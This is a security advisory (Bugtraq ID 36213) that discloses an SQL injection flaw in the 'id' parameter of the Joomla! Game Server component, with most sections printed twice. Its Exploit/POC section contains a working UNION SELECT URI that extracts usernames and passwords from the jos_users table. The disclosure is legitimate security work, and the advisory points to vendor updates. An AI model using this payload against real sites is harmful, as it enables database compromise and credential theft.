Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
BID:36213
Info
Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 36213 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2009 12:00AM |
| Updated: | Sep 28 2009 07:20PM |
| Credit: | v3n0m |
| Vulnerable: |
IndianPulse Game Server 1.0 |
| Not Vulnerable: | |
Discussion
Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
The Game Server component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Game Server component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
Solution / Fix
Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
Joomla! Game Server Component 'id' Parameter SQL Injection Vulnerability
References:
References:
- Game Server Releases (IndianPulse)